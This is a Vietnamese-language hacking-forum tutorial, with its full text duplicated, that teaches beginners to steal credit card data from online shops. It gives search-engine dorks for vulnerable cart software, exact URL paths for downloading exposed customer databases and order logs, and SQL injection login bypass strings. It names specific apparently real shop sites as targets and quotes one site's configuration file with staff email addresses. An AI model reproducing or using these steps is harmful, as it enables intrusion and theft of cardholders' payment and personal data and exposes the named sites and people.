Tags : :
Thường các hacker hack cc từ những lỗi nghiêm trọng của các site bán hàng trên toàn thế giới (c̣n vô số những site chưa fix )...các lỗi thường gặp là :
acart2_0
SalesCart Database Storage Insecurity
Trong file shopper.cgi
Cart32 Sites
VP-ASP
............
Dưới đây là bài viết chi tiết cách hack các lỗi đó, tất nhiên cũng ko phải tui t́m ra được các lỗi này...v́ các lỗi này đựoc t́m ra rất lâu rùi...được sang qua sang lại....đến nỗi tác giả của nó là ai cũng ko c̣n nhớ nỗi nữa...!!!
---------------------------------------------------------------------------------------------
Lỗi acart2_0" :
Đầu tiên các bạn vào http://google.com ( các bạn có thể vào các site t́m kiếm khác như http://av.com .... ) search keyword "acart2_0" ,bạn thấy rất nhiều file mắc lỗi này,do kinh nghiệm ḿnh khuyên các bạn nên chọn những site có dạng http://url/acart2_0/ ví dụ site http://www.coolrob.com/cart/acart2_0 ,gơ thêm" /acart2_0.mdb "vào đằng sau url, enter xong bạn thấy màn h́nh dơnload là thành công rùi đó...bạn có thể down toàn bộ file database *.mdb của shop bán hàng đó...
---------------------------------------------------------------------------------------------
Lỗi VP-ASP:
đầu tiên vào http://google.com search từ khoá "shopdisplaycategories" click vào site bạn sẽ thấy là http://www.sitename.com/shopping/sh...ycategories.asp
Việc tiếp theo là chuyển url http://www.sitename.com/shopping/sh...ycategories.asp thành url http://www.sitename.com/shopping/shopdbtest.asp nghĩa là thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter...nếu ra tiếp thêm một trang nữa...<---ko phảt là no page .th́ bạn có cơ hội down *mdb của site này đó...
sau khi ra trang mới xong,áp dụng công thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ]
-[vp-asp site] là : www.sitename.com
-[ vp-asp dir] là :shopping
-[ xDatabase + .mdb ] sẽ là shopping.mdb
nếu có màn h́nh save th́ bạn thành công rùi đó...
-----------------------------------------------------------------------------------------------
Lỗi shopper.cgi:
vào http://google.com search từ khoá shopper.cgi hoặc shopper.execopy những url có dạng sitename.com/cgi-bin/shopper.cgi?
sau đó paste vào browse và thêm ḍng search=action&keywords=ccpower &template=shopper.conf hoặc hoặc thêm ḍng search=action&keywords=ccpower &template=order1.log vào đằng sau,nếu may mắn bạn sẽ t́m thấy cc
-----------------------------------------------------------------------------------------------
Lỗi Cart32.exe:
vào google.com ,search từ khóa "Cart32.exe v3"đầu tiên vào http://www.sitename.com/cgi-bin/cart32.exe/sitename
Lấy Credit Cards : http://www.sitename.com/cgi-bin/car...name-ORDERS.txt
hoặc : http://www.sitename.com/cgi-bin/car...name-OUTPUT.txt
------------------------------------------------------------------------------------------------
Hack CC thông qua lỗi SalesCart Database Storage Insecurity:
Tổng quát: Lỗi này thực chất là dữ liệu của các chương tŕnh mua bán không được bảo mật, mă hóa hay cất giữ cẩn thận nên bạn hoàn toàn có thể lấy chúng một cách dễ dàng
Lưu ư: đôi khi với thực tế, 1 số link có thể khác đi, không phải lúc nào cũng hoàn toàn đúng, dữ liệu có khi bao gồm cả CRD (Credit Card) nên mọi việc phải qua proxy (nếu không có proxy th́ có thể ra dịch vụ...)
Khai thác: Hăy sử dụng 1 trong những link sau:
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
Ví dụ: site84vn.com có thể download cc từ đây: www.84vn.com/database/metacart.mdb
Có nghĩa là database không hề có 1 chút bảo mật nào cả. Download vô tư ! Trong database có thể bao gồm: name, surname, address, e-mail, phone number, credit card number, company name.....
Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc nào cũng suôn sẻ cả, bạn hăy tưởng tượng mỗi server có một cấu trúc riêng, ví dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link trên, hăy tận dụng lỗi và thử từng cái một , nhiều khi là www.victim.com/muaban/fpdb/shop.mdb v́ vậy nếu bạn xài cách này hăy linh hoạt trong link tuỳ vào từng site! <----copy by h4a......
------------------------------------------------------------------------------------------------
lên google t́m từ khóa
"inurl:commerce.cgi"
Rồi okie số địa chỉ online đang chờ đón
vd:
ta có site
<http://www.warresisters.org/store/commerce.cgi>?
xóa cái commerce.cgi? đi thay bằng Admin_files/commerce_user_lib.pl
ta sẽ được
## This file contains the user specific variables
## necessary for Commerce.cgi
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = "http://www.warresisters.org/store";
$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";
$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;
xóa cái commerce_user_lib.pl đi thay bằng onlinebookstore.log (t́m ở $sc_order_log_name ) và ....
Việc tiếp theo là thuộc về bạn
------------------------------------------------------------------------------------------------
Vào google gơ từ khoá tek9.aspta được link có dạng tương tự như thế này
https://ionicpurifier.com/tek9.asp?...ers&mode=search
bắy đầu từ /tek9.asp/ gơ thêm /intranethttps://ionicpurifier.com/intranet/tek9.asp...ers&mode=search
Sau đó đăng nhập với user và pass 'or''='nếu may mắn th́ sẽ vào được , và ăn cc tha hồ
c̣n rất nhiều site bị lỗi này
------------------------------------------------------------------------------------------------
Search keyword in google.com.vn : " Shoping /admin "
http://shopping.richardhealey.com/admin_login.asp
http://families-online.org/admin_login.asp
user/pass : ' or 1=1--
Code của site cho phép exploit lên SQL Server .
------------------------------------------------------------------------------------------------
Trên đây là các cách hack cc dành cho newbie...giúp bạn down *.mdb từ bất cứ site bị mắc các lỗi trên....c̣n nhiều cách hack cc nữa...rất tốn thời giờ...có thể ngồi cả ngày ...mà vẫn ko kiếp chát được ǵ...hack cc này như là ngồi câu cá vậy...quan trọng là phải biết kiên nhẫn....
sau khi save vào máy ( đă setup sẵn microsoft-access 2000 - nằm trong bộ microsoft-office) <-----chương tŕnh giúp đọc file *.mdb
double click chuột vào file db trên các bạn sẽ thấy rất nhiều tab, thông thường những thông tin trong tab oder là những thông tin mà chúng ta cần t́m kiếm ( cc ), click lên tab để view,sau khi click tab oder các bạn sẽ thấy rất nhiều thông tin, nhiều khi có cả cc ! Chúc bạn thành công..
acart2_0
SalesCart Database Storage Insecurity
Trong file shopper.cgi
Cart32 Sites
VP-ASP
............
Dưới đây là bài viết chi tiết cách hack các lỗi đó, tất nhiên cũng ko phải tui t́m ra được các lỗi này...v́ các lỗi này đựoc t́m ra rất lâu rùi...được sang qua sang lại....đến nỗi tác giả của nó là ai cũng ko c̣n nhớ nỗi nữa...!!!
---------------------------------------------------------------------------------------------
Lỗi acart2_0" :
Đầu tiên các bạn vào http://google.com ( các bạn có thể vào các site t́m kiếm khác như http://av.com .... ) search keyword "acart2_0" ,bạn thấy rất nhiều file mắc lỗi này,do kinh nghiệm ḿnh khuyên các bạn nên chọn những site có dạng http://url/acart2_0/ ví dụ site http://www.coolrob.com/cart/acart2_0 ,gơ thêm" /acart2_0.mdb "vào đằng sau url, enter xong bạn thấy màn h́nh dơnload là thành công rùi đó...bạn có thể down toàn bộ file database *.mdb của shop bán hàng đó...
---------------------------------------------------------------------------------------------
Lỗi VP-ASP:
đầu tiên vào http://google.com search từ khoá "shopdisplaycategories" click vào site bạn sẽ thấy là http://www.sitename.com/shopping/sh...ycategories.asp
Việc tiếp theo là chuyển url http://www.sitename.com/shopping/sh...ycategories.asp thành url http://www.sitename.com/shopping/shopdbtest.asp nghĩa là thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter...nếu ra tiếp thêm một trang nữa...<---ko phảt là no page .th́ bạn có cơ hội down *mdb của site này đó...
sau khi ra trang mới xong,áp dụng công thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ]
-[vp-asp site] là : www.sitename.com
-[ vp-asp dir] là :shopping
-[ xDatabase + .mdb ] sẽ là shopping.mdb
nếu có màn h́nh save th́ bạn thành công rùi đó...
-----------------------------------------------------------------------------------------------
Lỗi shopper.cgi:
vào http://google.com search từ khoá shopper.cgi hoặc shopper.execopy những url có dạng sitename.com/cgi-bin/shopper.cgi?
sau đó paste vào browse và thêm ḍng search=action&keywords=ccpower &template=shopper.conf hoặc hoặc thêm ḍng search=action&keywords=ccpower &template=order1.log vào đằng sau,nếu may mắn bạn sẽ t́m thấy cc
-----------------------------------------------------------------------------------------------
Lỗi Cart32.exe:
vào google.com ,search từ khóa "Cart32.exe v3"đầu tiên vào http://www.sitename.com/cgi-bin/cart32.exe/sitename
Lấy Credit Cards : http://www.sitename.com/cgi-bin/car...name-ORDERS.txt
hoặc : http://www.sitename.com/cgi-bin/car...name-OUTPUT.txt
------------------------------------------------------------------------------------------------
Hack CC thông qua lỗi SalesCart Database Storage Insecurity:
Tổng quát: Lỗi này thực chất là dữ liệu của các chương tŕnh mua bán không được bảo mật, mă hóa hay cất giữ cẩn thận nên bạn hoàn toàn có thể lấy chúng một cách dễ dàng
Lưu ư: đôi khi với thực tế, 1 số link có thể khác đi, không phải lúc nào cũng hoàn toàn đúng, dữ liệu có khi bao gồm cả CRD (Credit Card) nên mọi việc phải qua proxy (nếu không có proxy th́ có thể ra dịch vụ...)
Khai thác: Hăy sử dụng 1 trong những link sau:
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
Ví dụ: site84vn.com có thể download cc từ đây: www.84vn.com/database/metacart.mdb
Có nghĩa là database không hề có 1 chút bảo mật nào cả. Download vô tư ! Trong database có thể bao gồm: name, surname, address, e-mail, phone number, credit card number, company name.....
Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc nào cũng suôn sẻ cả, bạn hăy tưởng tượng mỗi server có một cấu trúc riêng, ví dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link trên, hăy tận dụng lỗi và thử từng cái một , nhiều khi là www.victim.com/muaban/fpdb/shop.mdb v́ vậy nếu bạn xài cách này hăy linh hoạt trong link tuỳ vào từng site! <----copy by h4a......
------------------------------------------------------------------------------------------------
lên google t́m từ khóa
"inurl:commerce.cgi"
Rồi okie số địa chỉ online đang chờ đón
vd:
ta có site
<http://www.warresisters.org/store/commerce.cgi>?
xóa cái commerce.cgi? đi thay bằng Admin_files/commerce_user_lib.pl
ta sẽ được
## This file contains the user specific variables
## necessary for Commerce.cgi
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = "http://www.warresisters.org/store";
$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";
$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;
xóa cái commerce_user_lib.pl đi thay bằng onlinebookstore.log (t́m ở $sc_order_log_name ) và ....
Việc tiếp theo là thuộc về bạn
------------------------------------------------------------------------------------------------
Vào google gơ từ khoá tek9.aspta được link có dạng tương tự như thế này
https://ionicpurifier.com/tek9.asp?...ers&mode=search
bắy đầu từ /tek9.asp/ gơ thêm /intranethttps://ionicpurifier.com/intranet/tek9.asp...ers&mode=search
Sau đó đăng nhập với user và pass 'or''='nếu may mắn th́ sẽ vào được , và ăn cc tha hồ
c̣n rất nhiều site bị lỗi này
------------------------------------------------------------------------------------------------
Search keyword in google.com.vn : " Shoping /admin "
http://shopping.richardhealey.com/admin_login.asp
http://families-online.org/admin_login.asp
user/pass : ' or 1=1--
Code của site cho phép exploit lên SQL Server .
------------------------------------------------------------------------------------------------
Trên đây là các cách hack cc dành cho newbie...giúp bạn down *.mdb từ bất cứ site bị mắc các lỗi trên....c̣n nhiều cách hack cc nữa...rất tốn thời giờ...có thể ngồi cả ngày ...mà vẫn ko kiếp chát được ǵ...hack cc này như là ngồi câu cá vậy...quan trọng là phải biết kiên nhẫn....
sau khi save vào máy ( đă setup sẵn microsoft-access 2000 - nằm trong bộ microsoft-office) <-----chương tŕnh giúp đọc file *.mdb
double click chuột vào file db trên các bạn sẽ thấy rất nhiều tab, thông thường những thông tin trong tab oder là những thông tin mà chúng ta cần t́m kiếm ( cc ), click lên tab để view,sau khi click tab oder các bạn sẽ thấy rất nhiều thông tin, nhiều khi có cả cc ! Chúc bạn thành công..